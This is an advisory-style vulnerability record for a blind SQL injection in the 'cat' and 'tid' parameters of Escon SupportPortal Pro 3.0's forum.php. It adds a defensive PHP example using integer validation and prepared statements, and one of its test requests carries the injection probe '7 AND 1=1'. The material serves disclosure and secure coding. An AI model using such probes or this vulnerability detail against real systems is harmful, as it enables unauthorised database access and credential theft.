vendor: Escon SupportPortal Pro
by: OzX
CVSS: 7.5 HIGH
Blind SQL Injection
CWE: 89
Product Name: Escon SupportPortal Pro
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: N/A
Related CWE: N/A
CPE: a:escon_supportportal:escon_supportportal_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
Blind SQL Injection in Escon SupportPortal Pro 3.0
A Blind SQL Injection vulnerability exists in Escon SupportPortal Pro 3.0. The vulnerable parameters are 'cat' and 'tid' in the 'forum.php' file. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerable code is located on lines 60-71 of the 'forum.php' file.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in database queries.
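
One way to apply this mitigation to the 'cat' and 'tid' parameters, shown as an added example that is not code from Escon SupportPortal Pro. The table, column and function names are hypothetical, and PHP with the pdo_sqlite extension is assumed.

```php
<?php
// Added example: hypothetical schema and function names, not the product's code.

/** Return the parameter as a positive integer, or null if it is anything else. */
function forum_int_param(array $query, string $name): ?int
{
    // Reject missing values and array-valued parameters such as cat[]=1.
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null;
    }
    $value = filter_var($query[$name], FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    return $value === false ? null : $value;
}

/** Look up one topic; input reaches SQL only as typed, bound parameters. */
function forum_fetch_topic(PDO $db, array $query): ?array
{
    $cat = forum_int_param($query, 'cat');
    $tid = forum_int_param($query, 'tid');
    if ($cat === null || $tid === null) {
        return null; // refuse the request before touching the database
    }
    // The SQL text is constant; no request data is concatenated into it.
    $stmt = $db->prepare(
        'SELECT id, title FROM topics WHERE category_id = :cat AND id = :tid'
    );
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->bindValue(':tid', $tid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory data so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE topics (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)');
$db->exec("INSERT INTO topics VALUES (7, 2, 'Printer setup')");

// Constructed requests: a well-formed one, a non-integer tid, an array-valued cat.
var_dump(forum_fetch_topic($db, ['cat' => '2', 'tid' => '7']));
var_dump(forum_fetch_topic($db, ['cat' => '2', 'tid' => '7 AND 1=1']));
var_dump(forum_fetch_topic($db, ['cat' => ['2'], 'tid' => '7']));
```

Returning the same response for a rejected parameter and for a missing topic keeps the page from exposing a true/false signal tied to the input.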